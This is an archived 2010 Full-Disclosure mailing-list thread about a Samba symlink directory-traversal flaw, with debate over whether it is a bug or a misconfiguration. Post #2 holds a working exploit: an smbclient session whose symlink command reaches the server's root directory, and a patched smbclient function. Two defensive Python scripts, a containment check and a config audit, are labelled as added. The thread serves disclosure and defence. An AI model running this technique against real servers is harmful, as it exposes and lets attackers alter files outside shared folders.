
Mailing List Archive: Full Disclosure: Full-Disclosure

Samba Remote Zero-Day Exploit

 

 



kcope2 at googlemail

Feb 4, 2010, 9:12 PM

Post #1 of 25 (2690 views)
Samba Remote Zero-Day Exploit

Hello list,

this is Kingcope.

You can view a demonstration of the zeroday entitled
'Samba Remote Zero-Day Exploit' with full details
on youtube. The bug is a logic fuckup.

http://www.youtube.com/watch?v=NN50RtZ2N74

I added a nice Greek tune, so turn your speakers on (or off).

Greetings to Alex and andi.

Cheerio and Signed,

//Kingcope


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


kcope2 at googlemail

Feb 5, 2010, 8:04 AM

Post #2 of 25 (2638 views)
Re: Samba Remote Zero-Day Exploit [In reply to]

Samba Remote Directory Traversal
logic fuckup discovered & exploited by Kingcope in 2010

It seems there was a quite similar bug found back in 2004:
http://marc.info/?l=bugtraq&m=109658688505723&w=2

A remote attacker can read, list and retrieve nearly all files on the system remotely.
Required is a valid Samba account for a share which is writeable OR
a writeable share which is configured to be a guest account share;
in this case this is a preauth exploit.

The attacker can write for example into /tmp or where the account
he is connecting with has access to (/home/<user> etc).

Exploit session (using the patched smbclient exploit):

smb is a samba user created.

root [at] nr-pentes:~/Downloads/samba-3.4.5/source3# /usr/local/samba/bin/smbclient -s /etc/samba/smb.conf -Usmb //<host>/testmount/
Enter smb's password:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]
smb: \> ls
. D 0 Wed Feb 3 14:27:03 2010
.. D 0 Wed Feb 3 14:19:13 2010
test D 0 Wed Feb 3 14:19:13 2010
xxx A 1955 Wed Feb 3 14:22:42 2010

45503 blocks of size 2097152. 24437 blocks available
smb: \> symlink ../../../../../ foobar
smb: \> ls
. D 0 Wed Feb 3 14:27:47 2010
.. D 0 Wed Feb 3 14:19:13 2010
xxx A 1955 Wed Feb 3 14:22:42 2010
foobar D 0 Mon Feb 1 20:29:12 2010

45503 blocks of size 2097152. 24437 blocks available
smb: \> ls ..
NT_STATUS_OBJECT_PATH_SYNTAX_BAD listing \..

45503 blocks of size 2097152. 24437 blocks available
smb: \> cd foobar
smb: \foobar\> ls
. D 0 Mon Feb 1 20:29:12 2010
.. D 0 Mon Feb 1 20:29:12 2010
initrd.img.old 7646184 Mon Jan 18 13:15:48 2010
boot.ini 18832 Mon Feb 1 20:29:12 2010
home D 0 Mon Jan 18 13:08:24 2010
initrd.img 8007195 Thu Jan 21 21:51:26 2010
.cache DH 0 Sat Jan 23 14:19:08 2010
opt D 0 Sat Jan 30 11:39:59 2010
lib D 0 Thu Jan 21 21:13:01 2010
usr D 0 Sun Jan 31 22:08:11 2010
.libs DH 0 Thu Jan 21 12:30:48 2010
var D 0 Sun Jan 31 21:14:42 2010
bin D 0 Mon Jan 18 13:31:14 2010
selinux D 0 Tue Oct 20 01:05:22 2009
root D 0 Tue Feb 2 19:43:59 2010
vmlinuz.old 3890400 Fri Oct 16 20:03:49 2009
vmlinuz 3890560 Thu Dec 10 20:33:26 2009
etc D 0 Wed Feb 3 14:17:29 2010
srv D 0 Sat Jan 23 20:17:29 2010
proc DR 0 Wed Feb 3 14:10:41 2010
dev D 0 Wed Feb 3 14:11:02 2010
boot D 0 Thu Jan 21 21:51:26 2010
mnt D 0 Sat Jan 23 19:26:23 2010
media D 0 Fri Jan 29 08:32:31 2010
cdrom D 0 Mon Jan 18 12:40:11 2010
tmp D 0 Wed Feb 3 14:26:20 2010
sbin D 0 Thu Jan 21 21:50:58 2010
lost+found D 0 Mon Jan 18 12:39:57 2010
sys D 0 Wed Feb 3 14:10:41 2010

45503 blocks of size 2097152. 24437 blocks available
smb: \foobar\>

put and get work in the folder now!

List open shares (this is normal operation mode, not an exploit):

root [at] nr-pentes:~/Downloads/samba-3.4.5/source3/client# /usr/local/samba/bin/smbclient -s /etc/samba/smb.conf -L //<host>/
Enter root's password:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]

Sharename Type Comment
--------- ---- -------
testmount Disk // < this share is writable and exploitable!!
print$ Disk Printer Drivers
IPC$ IPC IPC Service (nr-pentest server (Samba, Ubuntu))
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.4.0]

Server Comment
--------- -------
NR-PENTEST nr-pentest server (Samba, Ubuntu)

Workgroup Master
--------- -------
WORKGROUP NR-PENTEST


smbclient patch (exploit):

samba-3.4.5/source3/client/client.c
/****************************************************************************
 UNIX symlink.
****************************************************************************/

static int cmd_symlink(void)
{
    TALLOC_CTX *ctx = talloc_tos();
    char *oldname = NULL;
    char *newname = NULL;
    char *buf = NULL;
    char *buf2 = NULL;
    char *targetname = NULL;
    struct cli_state *targetcli;

    if (!next_token_talloc(ctx, &cmd_ptr, &buf, NULL) ||
        !next_token_talloc(ctx, &cmd_ptr, &buf2, NULL)) {
        d_printf("symlink <oldname> <newname>\n");
        return 1;
    }
    /* Modified: both names are sent exactly as typed instead of being
     * prefixed with the current share directory (original lines below). */
    oldname = talloc_asprintf(ctx,
            "%s", // << HERE modified
            buf);
    if (!oldname) {
        return 1;
    }
    newname = talloc_asprintf(ctx,
            "%s", // << HERE modified
            buf2);
    if (!newname) {
        return 1;
    }
    /* ORIGINAL SMBCLIENT SOURCE LINES TO BE MODIFIED (SEE ABOVE).
    oldname = talloc_asprintf(ctx,
            "%s%s",               // < modified (see above)
            client_get_cur_dir(), // < removed (see above)
            buf);
    if (!oldname) {
        return 1;
    }
    newname = talloc_asprintf(ctx,
            "%s%s",               // < modified (see above)
            client_get_cur_dir(), // < removed (see above)
            buf2);
    if (!newname) {
        return 1;
    }
    ----------------------------------------------*/

    if (!cli_resolve_path(ctx, "", auth_info, cli, oldname, &targetcli, &targetname)) {
        d_printf("link %s: %s\n", oldname, cli_errstr(cli));
        return 1;
    }

    if (!SERVER_HAS_UNIX_CIFS(targetcli)) {
        d_printf("Server doesn't support UNIX CIFS calls.\n");
        return 1;
    }

    if (!cli_unix_symlink(targetcli, targetname, newname)) {
        d_printf("%s symlinking files (%s -> %s)\n",
                 cli_errstr(targetcli), newname, targetname);
        return 1;
    }

    return 0;
}


// Cheers,
// kcope



paul.szabo at sydney

Feb 5, 2010, 2:03 PM

Post #3 of 25 (2625 views)
Re: Samba Remote Zero-Day Exploit [In reply to]

Dear Kingcope,

The samba server follows symlinks by default. There are options
("follow symlinks", "wide links") for turning it off:

http://www.samba.org/samba/docs/using_samba/ch08.html#samba2-CHP-8-SECT-1.2
http://www.samba.org/samba/docs/man/manpages-3/smb.conf.5.html#FOLLOWSYMLINKS
http://www.samba.org/samba/docs/man/manpages-3/smb.conf.5.html#WIDELINKS

The "problem" at your installation seems to be a misconfiguration of
your server: please ask the admin to set "secure" options.
(Some samba installations, like mine, wish to allow the same access as a
UNIX login would allow. Some shares like [home] are provided for ease
of use, and users are encouraged to create symlinks to other "interesting"
places, e.g. NFS-mounted directories.)

Cheers, Paul

Paul Szabo psz [at] maths http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia



dan at doxpara

Feb 5, 2010, 2:26 PM

Post #4 of 25 (2624 views)
Re: Samba Remote Zero-Day Exploit [In reply to]

The bug here is that out-of-path symlinks are remotely writable. If a
pre-existing symlink is there, it's not a problem. But Kingcope's bug is
legit, the fact that he can *generate* the symlink breaks the entire path
concept of SMB shares. As long as "cd .." wasn't working, "symlink .."
mustn't either.

I agree that a user with local access should be able to generate out of path
symlinks -- there's no path constraint concept in local access (well, not
without a restricted shell, but that's its own ball of wax). But Samba
supports dropping a user into a path, and it really does need to keep him
there.

(On a side note, you're not going to see this sort of symlink stuff on
Windows, and Samba is supposed to match Windows semantics in general. Also,
this sort of directory traversal pops up from year to year, in web platforms
particularly, but also things like tar.)

On Fri, Feb 5, 2010 at 5:03 PM, <paul.szabo [at] sydney> wrote:

> Dear Kingcope,
>
> The samba server follows symlinks by default. There are options
> ("follow symlinks", "wide links") for turning it off:
>
> http://www.samba.org/samba/docs/using_samba/ch08.html#samba2-CHP-8-SECT-1.2
>
> http://www.samba.org/samba/docs/man/manpages-3/smb.conf.5.html#FOLLOWSYMLINKS
> http://www.samba.org/samba/docs/man/manpages-3/smb.conf.5.html#WIDELINKS
>
> The "problem" at your installation seems a mis-configuration of
> your server: please ask the admin to set "secure" options.
> (Some samba installations, like mine, wish to allow same access as a
> UNIX login would allow. Some shares like [home] are provided for ease
> of use, users are encouraged to create symlinks to other "interesting"
> places e.g. NFS-mounted directories.)
>
> Cheers, Paul
>
> Paul Szabo psz [at] maths http://www.maths.usyd.edu.au/u/psz/
> School of Mathematics and Statistics University of Sydney Australia
>


paul.szabo at sydney

Feb 5, 2010, 2:43 PM

Post #5 of 25 (2621 views)
Re: Samba Remote Zero-Day Exploit [In reply to]

Dear Dan,

> The bug here is that out-of-path symlinks are remotely writable. ...

You mean "creatable".

> ... the fact that he can *generate* the symlink breaks ...

Nothing breaks if the admin sets "wide links = no" for that share: the
link is not followed.

> But Samba supports dropping a user into a path ...

I never noticed such support documented: references please?

> ... and it really does need to keep him there.

You cannot "break out" of shares with "wide links = no".

> ... Samba is supposed to match Windows semantics in general.

No please, do not dumb it down.

Cheers, Paul

Paul Szabo psz [at] maths http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia



kcope2 at googlemail

Feb 5, 2010, 3:38 PM

Post #6 of 25 (2625 views)
Re: Samba Remote Zero-Day Exploit [In reply to]

Hello Paul,

First and foremost I did not know about the configuration setting which
closes the bug when I posted the advisory. So this was my mistake.
But for most servers which are not entirely hardened (and my
assumption is that this applies to many servers in internal networks)
the traversal can be a serious issue, because a Samba user (even nobody)
can create the symlinks. It would in my point of view be more secure to
only allow administrators to create symlinks as it is intended.
Again I might be wrong with this thought.
I first audited Windows Server 2008 for the new SMB2 hardlinking
features. Symlinking on a Windows server is possible but only when the
remotely logged in account is the Administrator. Creating symlinks to
paths outside the directory of the given share is not possible. However
accessing a symlink in a directory which points to for example c:\
is possible. I don't say that because Samba should have the same
semantics as Windows, but because its implementation of handling remote
to local and local to remote symbolic links is more secure.
After failing in auditing the Windows servers on the potential
vulnerabilities I just gave Samba a try and the default configuration
of my Ubuntu Desktop System and CentOS Server allowed me to conduct the
attack out of the box. Turning off symlink support in Samba closes the
hole but then no access to symlinks created by the administrator is
possible, or am I wrong?

With Respect,

Kingcope

On Saturday, 06.02.2010, 09:43 +1100, paul.szabo [at] sydney wrote:
> Dear Dan,
>
> > The bug here is that out-of-path symlinks are remotely writable. ...
>
> You mean "creatable".
>
> > ... the fact that he can *generate* the symlink breaks ...
>
> Nothing breaks if the admin sets "wide links = no" for that share: the
> link is not followed.
>
> > But Samba supports dropping a user into a path ...
>
> I never noticed such support documented: references please?
>
> > ... and it really does need to keep him there.
>
> You cannot "break out" of shares with "wide links = no".
>
> > ... Samba is supposed to match Windows semantics in general.
>
> No please, do not dumb it down.
>
> Cheers, Paul
>
> Paul Szabo psz [at] maths http://www.maths.usyd.edu.au/u/psz/
> School of Mathematics and Statistics University of Sydney Australia




paul.szabo at sydney

Feb 5, 2010, 4:04 PM

Post #7 of 25 (2626 views)
Re: Samba Remote Zero-Day Exploit [In reply to]

Dear Kingcope,

> Turning off symlink support in samba closes the hole but then no
> access to symlinks created by the administrator is possible ...

Correct.

Maybe what you want is for Samba to add and support an option like
"allow create symlink" (with default "no"). I myself do not think it
would be useful... would surely be a few lines of code only, so if you
want to submit a patch to the Samba team... or just patch your own
servers (as I do, see http://www.maths.usyd.edu.au/u/psz/samba/).

Cheers, Paul

Paul Szabo psz [at] maths http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia



Thierry at Zoller

Feb 6, 2010, 3:43 AM

Post #8 of 25 (2596 views)
Re: Samba Remote Zero-Day Exploit [In reply to]

Hi Paul,

Facts:
- Several distributions run with vulnerable settings per default;
if there is a "misconfiguration" it is part of the vendor.
- You're not supposed to be able to traverse dirs.

Consequence: it is a vulnerability; whether you can mitigate it is
a different piece of cake.

Next time somebody creates an IE8 0day that relies on javascript,
will you scream "misconfiguration!"? Of course you could disable
javascript, but is it enabled by default? Yes.

The question for smb is who does restrict this setting?
My tests reveal - not many.

Congrats Kingcope, nice bug. Directory traversal in a major daemon in
2010.

Regards,
Thierry


pssea> Dear Kingcope,

pssea> The samba server follows symlinks by default. There are options
pssea> ("follow symlinks", "wide links") for turning it off:

pssea> http://www.samba.org/samba/docs/using_samba/ch08.html#samba2-CHP-8-SECT-1.2
pssea> http://www.samba.org/samba/docs/man/manpages-3/smb.conf.5.html#FOLLOWSYMLINKS
pssea> http://www.samba.org/samba/docs/man/manpages-3/smb.conf.5.html#WIDELINKS

pssea> The "problem" at your installation seems a mis-configuration of
pssea> your server: please ask the admin to set "secure" options.
pssea> (Some samba installations, like mine, wish to allow same access as a
pssea> UNIX login would allow. Some shares like [home] are provided for ease
pssea> of use, users are encouraged to create symlinks to other "interesting"
pssea> places e.g. NFS-mounted directories.)

pssea> Cheers, Paul

pssea> Paul Szabo psz [at] maths
pssea> http://www.maths.usyd.edu.au/u/psz/
pssea> School of Mathematics and Statistics University of Sydney Australia




--
http://blog.zoller.lu
Thierry Zoller




Thierry at Zoller

Feb 6, 2010, 3:50 AM

Post #9 of 25 (2591 views)
Re: Samba Remote Zero-Day Exploit [In reply to]

http://blog.metasploit.com/2010/02/exploiting-samba-symlink-traversal.html

--
http://blog.zoller.lu
Thierry Zoller




paul.szabo at sydney

Feb 6, 2010, 4:59 AM

Post #10 of 25 (2595 views)
Re: Samba Remote Zero-Day Exploit [In reply to]

Dear Thierry,

> Of course you could disable ... but is it by enabled default?

Hmm... looking at
http://www.samba.org/samba/docs/man/manpages-3/smb.conf.5.html#WRITEABLE
http://www.samba.org/samba/docs/man/manpages-3/smb.conf.5.html#READONLY
it seems that writeable is off by default: a Samba installation, as per
default, is not vulnerable.

> - Several distributions run with vulnerable settings per default
> if there is a "misconfiguration" it is part of the vendor.

Is that vendor Samba?

Cheers, Paul

Paul Szabo psz [at] maths http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia



stefan.kanthak at nexgo

Feb 6, 2010, 5:21 AM

Post #11 of 25 (2593 views)
Re: Samba Remote Zero-Day Exploit [In reply to]

Dan Kaminsky wrote:

[...]

> (On a side note, you're not going to see this sort of symlink stuff on
> Windows,

What exactly do you mean?
Traversing symlinks on the server/share, or creation of "wide" symlinks
by the client on the server/share?

Since Windows 2000 NTFS supports "junctions", which pretty much resemble
Unix symlinks, but only for directories.
See <http://support.microsoft.com/kb/205524/en-us>

On the server, create a junction in your share and let it point to an
arbitrary local directory outside the share, and clients connected to
that share can enter the junction and access the "linked" directory.

If you have write access to the share from the client you can create
a "wide" junction there too, just as the OP showed with smbclient/samba.

> and Samba is supposed to match Windows semantics in general.

Except a mapping of directory symlinks to junctions for example.-(

Stefan



dan at doxpara

Feb 6, 2010, 9:43 AM

Post #12 of 25 (2582 views)
Re: Samba Remote Zero-Day Exploit [In reply to]

You need admin rights to create junctions. At that point, path
constraints aren't relevant, just psexec and get not only arbitrary
path but arbitrary code.

The fix is to do what everybody with a directory traversal bug has to
do, block out of path relative directories. In this specific case,
prevent the creation of symlinks where the target is out of the SMB
share's range. (Still allow navigation to such symlinks if one exists,
though.)



On Feb 6, 2010, at 8:21 AM, "Stefan Kanthak" <stefan.kanthak [at] nexgo>
wrote:

> Dan Kaminsky wrote:
>
> [...]
>
>> (On a side note, you're not going to see this sort of symlink stuff
>> on
>> Windows,
>
> What exactly do you mean?
> Traversing symlinks on the server/share, or creation of "wide"
> symlinks
> by the client on the server/share?
>
> Since Windows 2000 NTFS supports "junctions", which pretty much
> resemble
> Unix symlinks, but only for directories.
> See <http://support.microsoft.com/kb/205524/en-us>
>
> On the server, create a junction in your share and let it point to an
> arbitrary local directory outside the share, and clients connected to
> that share can enter the junction and access the "linked" directory.
>
> If you have write access to the share from the client you can create
> a "wide" junction there too, just as the OP showed with smbclient/
> samba.
>
>> and Samba is supposed to match Windows semantics in general.
>
> Except a mapping of directory symlinks to junctions for example.-(
>
> Stefan
>

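The containment rule Dan describes (refuse to create a symlink whose target resolves outside the share, leave navigation of existing links alone), written out as an added Python illustration; this is not Samba's code, and the share root /srv/testmount and the link requests are constructed to mirror the session in Post #2:

```python
"""Containment rule for symlink creation, as an illustration of the fix Dan
describes: a link may only be created when its target stays inside the share
root; navigating links that already exist is not touched. Paths are handled
lexically with posixpath, so nothing here touches a real filesystem."""
import posixpath


class SymlinkEscape(ValueError):
    """Raised when a requested link or its target would leave the share root."""


def _contained(share_root, path):
    """True if the normalised absolute path is share_root or lies below it."""
    root = posixpath.normpath(share_root)
    path = posixpath.normpath(path)
    if root == "/":
        return path.startswith("/")
    return path == root or path.startswith(root + "/")


def resolve_link_target(share_root, link_path, target):
    """Absolute path a link at share-relative link_path would point to.

    A relative target is interpreted relative to the directory that will hold
    the link (which is how the kernel follows it); an absolute target is taken
    as-is, since it names a location on the server's filesystem directly.
    """
    link_abs = posixpath.normpath(posixpath.join(share_root, link_path.lstrip("/")))
    if not _contained(share_root, link_abs):
        raise SymlinkEscape(f"link path {link_path!r} leaves the share")
    if posixpath.isabs(target):
        return posixpath.normpath(target)
    return posixpath.normpath(posixpath.join(posixpath.dirname(link_abs), target))


def check_symlink_request(share_root, link_path, target):
    """Return the resolved target if the link may be created, else raise.

    Caveat: the check is lexical. A server-side implementation must
    canonicalise the existing prefix of the target (realpath) before this
    comparison, otherwise a component that is itself a symlink could still
    resolve elsewhere. Links created by other means (a local login, as Paul
    describes) are not covered here; that is what "wide links = no" is for.
    """
    resolved = resolve_link_target(share_root, link_path, target)
    if not _contained(share_root, resolved):
        raise SymlinkEscape(
            f"target {target!r} resolves to {resolved}, outside {share_root}")
    return resolved


def would_allow(share_root, link_path, target):
    """Boolean form of check_symlink_request for table-driven use."""
    try:
        check_symlink_request(share_root, link_path, target)
        return True
    except SymlinkEscape:
        return False


if __name__ == "__main__":
    # Constructed share root standing in for the thread's "testmount" share.
    ROOT = "/srv/testmount"
    REQUESTS = [
        ("foobar", "../../../../../"),   # the thread's request: escapes to /
        ("link", "test/xxx"),            # stays inside the share
        ("test/up", "../xxx"),           # relative to the link's directory
        ("test/up2", "../../xxx"),       # one level too far
        ("pw", "/etc/passwd"),           # absolute target outside the share
    ]
    for link, target in REQUESTS:
        verdict = "allow" if would_allow(ROOT, link, target) else "REJECT"
        print(f"{verdict:6} symlink {target} {link}")
```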


marxclou at hushmail

Feb 6, 2010, 11:46 AM

Post #13 of 25 (2574 views)
Samba Remote Zero-Day Exploit [In reply to]


Dear Paul,

seems like u get personally pissed about the situation or you are not
able to see that this is obviously a problem. But maybe you can
enlighten everybody how it is possible per "default" not to
traverse a directory by cd but to do this via symlink? To put the
circle the other way around, do you have an option per "default" enabled
which forbids to traverse a directory? No?

Regards,
Marx



marxclou at hushmail

Feb 6, 2010, 12:43 PM

Post #14 of 25 (2572 views)
Re: Samba Remote Zero-Day Exploit [In reply to]


>The default setting is "writeable = no". If you change that, then
>you are responsible for reading the docs and setting secure
>options.

This is an interesting point of view. However u haven't answered my
question. Is there an option to enable a traversal or let's say
chdir to a path outside of the configured environment which is
disabled by default?

Regards,
marx

On Sat, 06 Feb 2010 21:29:14 +0100 paul.szabo [at] sydney wrote:
>Dear Marx,
>
>> seems like u get personal pissed ...
>
>No I do not take it personally.
>
>> ... how it is possible per "default" ...
>
>The default setting is "writeable = no". If you change that, then
>you are responsible for reading the docs and setting secure
>options.
>
>Cheers, Paul
>
>Paul Szabo psz [at] maths
>http://www.maths.usyd.edu.au/u/psz/
>School of Mathematics and Statistics University of Sydney
>Australia



paul.szabo at sydney

Feb 6, 2010, 12:59 PM

Post #15 of 25 (2574 views)
Re: Samba Remote Zero-Day Exploit [In reply to]

Dear Marx,

> This is an interesting point of view.

I had replied to you personally only, you should not have posted my
reply to any mailing lists. But since you posted... yes my views are
interesting, should be studied and followed, for enlightenment :-)

> However u haven't answered my question. Is there an option to enable
> a traversal or let's say chdir to a path outside of the configured
> environment which is disabled by default?

No I do not think there is an option to allow chdir to outside.
(Please scrutinize docs and sources, I may have missed something.)

Cheers, Paul

Paul Szabo psz [at] maths http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia



paul.szabo at sydney

Feb 6, 2010, 1:48 PM

Post #16 of 25 (2573 views)
Re: Samba Remote Zero-Day Exploit [In reply to]

I find it puzzling how this discussion, including the official Samba
response

http://www.samba.org/samba/news/symlink_attack.html

fails to consider whether the mentioned configuration (when the admin sets
non-default "writeable = yes" but leaves the default "wide links = yes")
allows write access to the whole filesystem (where the user has UNIX
rights). I also wonder about the interaction with the setting of "unix
extensions" (which I had set to non-default "no" to help Mac clients).

Cheers, Paul

Paul Szabo psz [at] maths http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia

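An added audit script (not from the thread or from Samba) that flags the combination this thread turns on: a share the admin made writeable, with the Samba 3.4 defaults "unix extensions = yes" (needed for a client to create the link at all, as the SERVER_HAS_UNIX_CIFS check in the smbclient code shows), "wide links = yes" and "follow symlinks = yes" left in place; "guest ok" shares are reported as the pre-auth case from Post #2. The smb.conf sample is constructed.

```python
"""Audit an smb.conf for the exposure discussed in this thread.

A client can create a symlink on a share only when the share is writeable and
the CIFS UNIX extensions are on; the server then follows that link outside
the share only when "wide links" and "follow symlinks" are on. The latter
three are Samba 3.4 defaults, so the audit flags shares where the admin
enabled writeable access and left the rest alone, and notes "guest ok"."""
import re

# Parameter synonyms, keyed by normalised name (lower-case, whitespace removed).
_SYNONYMS = {"writable": "writeable", "writeok": "writeable", "public": "guestok"}
# "read only" is the inverse of "writeable".
_INVERTED = {"readonly": "writeable"}
# Defaults as stated in the thread for Samba 3.4.
_DEFAULTS = {"writeable": False, "widelinks": True, "followsymlinks": True,
             "unixextensions": True, "guestok": False}


def _norm(name):
    """smb.conf names are case-insensitive and ignore internal whitespace."""
    return re.sub(r"\s+", "", name).lower()


def _to_bool(value):
    v = value.strip().lower()
    if v in ("yes", "true", "1"):
        return True
    if v in ("no", "false", "0"):
        return False
    raise ValueError(f"not a boolean smb.conf value: {value!r}")


def parse_smb_conf(text):
    """Return {section: {normalised parameter: raw value}} for an smb.conf."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = _norm(line[1:-1])
            sections[current] = {}
            continue
        if current is None or "=" not in line:
            continue
        key, value = line.split("=", 1)
        key, value = _norm(key), value.strip()
        if key in _INVERTED:          # read only = yes  ->  writeable = no
            key, value = _INVERTED[key], ("no" if _to_bool(value) else "yes")
        sections[current][_SYNONYMS.get(key, key)] = value
    return sections


def effective(sections, share, param):
    """Share-level value, then [global], then the default."""
    for scope in (share, "global"):
        if param in sections.get(scope, {}):
            return _to_bool(sections[scope][param])
    return _DEFAULTS[param]


def find_exposed_shares(text):
    """Return [(share, guest_ok)] for shares matching the thread's combination."""
    sections = parse_smb_conf(text)
    exposed = []
    for share in sections:
        if share == "global":
            continue
        can_create = (effective(sections, share, "writeable")
                      and effective(sections, share, "unixextensions"))
        is_followed = (effective(sections, share, "widelinks")
                       and effective(sections, share, "followsymlinks"))
        if can_create and is_followed:
            exposed.append((share, effective(sections, share, "guestok")))
    return exposed


# Constructed sample: [testmount] mirrors the thread's share, [fixed] applies
# "wide links = no" as Paul recommends, [ro] keeps the writeable default.
SAMPLE_CONF = """\
[global]
   workgroup = WORKGROUP
   ; unix extensions, wide links and follow symlinks left at their defaults

[testmount]
   path = /srv/testmount
   writeable = yes
   guest ok = yes

[fixed]
   path = /srv/fixed
   read only = no
   wide links = no

[ro]
   path = /srv/ro
"""

if __name__ == "__main__":
    for share, guest in find_exposed_shares(SAMPLE_CONF):
        print(f"[{share}]: writeable, symlinks followed outside the share"
              + (" (guest ok: reachable pre-auth)" if guest else ""))
```

Setting "unix extensions = no" globally, as Paul mentions having done, also clears the finding, because it removes the client's ability to create the link in the first place.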


marxclou at hushmail

Feb 6, 2010, 2:06 PM

Post #17 of 25 (2571 views)
Re: Samba Remote Zero-Day Exploit [In reply to]


> I had replied to you personally only, you should not have posted my
> reply to any mailing lists. But since you posted...

I'm very sorry about this. This may sound odd, but it wasn't my
idea of putting a private mail public. This was not an act of
disrespect.

Best regards,
marx



stefan.kanthak at nexgo

Feb 6, 2010, 2:26 PM

Post #18 of 25 (2425 views)
Re: Samba Remote Zero-Day Exploit [In reply to]

Dan Kaminsky wrote on February 06, 2010 6:43 PM:

> You need admin rights to create junctions.

OUCH!
No, creating junctions (as well as the Vista introduced symlinks)
DOESN'T need admin rights!

[snip]

Stefan



dan at doxpara

Feb 6, 2010, 2:30 PM

Post #19 of 25 (2562 views)
Re: Samba Remote Zero-Day Exploit [In reply to]

On Feb 6, 2010, at 5:26 PM, "Stefan Kanthak" <stefan.kanthak [at] nexgo>
wrote:

> Dan Kaminsky wrote on February 06, 2010 6:43 PM:
>
>> You need admin rights to create junctions.
>
> OUCH!
> No, creating junctions (as well as the Vista introduced symlinks)
> DOESN'T need admin rights!
>
> [snip]
>

Really? Try. Especially remotely over SMB w/o remote interactive.


> Stefan
>



Michael.Wojcik at microfocus

Feb 8, 2010, 12:38 PM

Post #20 of 25 (2331 views)
Re: Samba Remote Zero-Day Exploit [In reply to]

> From: Stefan Kanthak [mailto:stefan.kanthak [at] nexgo]
> Sent: Saturday, 06 February, 2010 08:21
>
> Dan Kaminsky wrote:
>
> [...]
>
> > (On a side note, you're not going to see this sort of symlink stuff
> > on Windows,
>
> What exactly do you mean?
> Traversing symlinks on the server/share, or creation of "wide" symlinks
> by the client on the server/share?
>
> Since Windows 2000 NTFS supports "junctions", which pretty much
> resemble Unix symlinks, but only for directories.
> See <http://support.microsoft.com/kb/205524/en-us>

And at least since Vista, it also supports symlinks, which are designed
to mimic Unix symlinks, and can point to files or directories. Junctions
and symlinks can cross volumes; symlinks can also refer to files or
directories on network filesystems.

Junctions (which Microsoft also sometimes refers to as "soft links") and
symlinks are implemented with NTFS reparse points, just like mounts. You
can see some of the differences between them using "fsutil reparsepoint
query <path>", where "<path>" is a junction or symlink.

In Vista and later, symlinks and junctions can be created with the
mklink command. (I've seen some comments about symlinks being available
in earlier versions of NTFS, via Services for Unix; but at least in SFU
2.0, symlinks were just files with a special format, not reparse
points.)

The Windows SMB server apparently won't cross reparse points, though, so
there's no equivalent vulnerability.

--
Michael Wojcik
Principal Software Systems Developer, Micro Focus



stefan.kanthak at nexgo

Feb 8, 2010, 1:33 PM

Post #21 of 25 (2322 views)
Re: Samba Remote Zero-Day Exploit [In reply to]

Michael Wojcik wrote:

>> From: Stefan Kanthak [mailto:stefan.kanthak [at] nexgo]
>> Sent: Saturday, 06 February, 2010 08:21
>>
>> Dan Kaminsky wrote:
>>
>> [...]
>>
>> > (On a side note, you're not going to see this sort of symlink stuff
>> > on Windows,
>>
>> What exactly do you mean?
>> Traversing symlinks on the server/share, or creation of "wide" symlinks
>> by the client on the server/share?
>>
>> Since Windows 2000 NTFS supports "junctions", which pretty much
>> resemble Unix symlinks, but only for directories.
>> See <http://support.microsoft.com/kb/205524/en-us>
>
> And at least since Vista, it also supports symlinks, which are designed

s/at least//

[ well-known facts snipped ]

> The Windows SMB server apparently won't cross reparse points, though, so
> there's no equivalent vulnerability.

NO, Windows SMB server crosses reparse points!

But as Dan Kaminsky pointed out, you need to have administrative rights
to remotely create a junction on an SMB share, so the non-admin user
can't get himself access to files outside a share he's allowed to access.

Stefan



khc at pm

Feb 8, 2010, 1:57 PM

Post #22 of 25 (2329 views)
Re: Samba Remote Zero-Day Exploit [In reply to]

Thierry Zoller <Thierry [at] zoller> writes:

> Facts :
> - Several distributions run with vulnerable settings per default
> if there is a "misconfiguration" it is part of the vendor.
> - Your not supposed to be able to traverse dirs.

What's wrong with creating $HOME/tmp -> /tmp/$USER (not necessarily
with Samba, maybe with xterm or ssh) and then accessing /tmp/$USER via
/host/HOME/tmp? Why is it a problem while "ssh host cat /etc/passwd" is
not?

Can you traverse a directory for which you have no +x right?
Can you, for example, write to a file for which you have no +w right?
Read without +r?

If you can't, maybe it's a (local config?) issue with guest accounts, or
maybe Windows-only (and similar, non-guest) accounts, instead of
permissions and symlinks?

Disabling or limiting symlink creation will not really close the "hole",
the problem is not the symlink but that the user has fs access which he
(or she) should never have.

... unless (obviously) the answer to any of the 3 questions is positive
(I haven't checked, to be honest) - is it?
--
Chris



Michael.Wojcik at microfocus

Feb 9, 2010, 6:20 AM

Post #23 of 25 (2326 views)
Re: Samba Remote Zero-Day Exploit [In reply to]

> From: Stefan Kanthak [mailto:stefan.kanthak [at] nexgo]
> Sent: Monday, 08 February, 2010 16:33
>
> Michael Wojcik wrote:
>
> >> From: Stefan Kanthak [mailto:stefan.kanthak [at] nexgo]
> >> Sent: Saturday, 06 February, 2010 08:21
> >>
> >> Since Windows 2000 NTFS supports "junctions", which pretty much
> >> resemble Unix symlinks, but only for directories.
> >> See <http://support.microsoft.com/kb/205524/en-us>
> >
> > And at least since Vista, it also supports symlinks, which are
> > designed
>
> s/at least//
> [ well-known facts snipped ]

So ... your original note about junctions did not cover "well-known
facts", but my note about other reparse point types did?

> > The Windows SMB server apparently won't cross reparse points, though,
> > so there's no equivalent vulnerability.
>
> NO, Windows SMB server crosses reparse points!

Not in my testing, at least not for junctions and symlinks. User with
requisite authority could traverse the junctions and symlinks locally,
but not remotely via a share.

> But as Dan Kaminsky pointed out, you need to have administrative rights
> to remotely create a junction on an SMB share, so the non-admin user
> can't get himself access to files outside a share he's allowed to
> access.

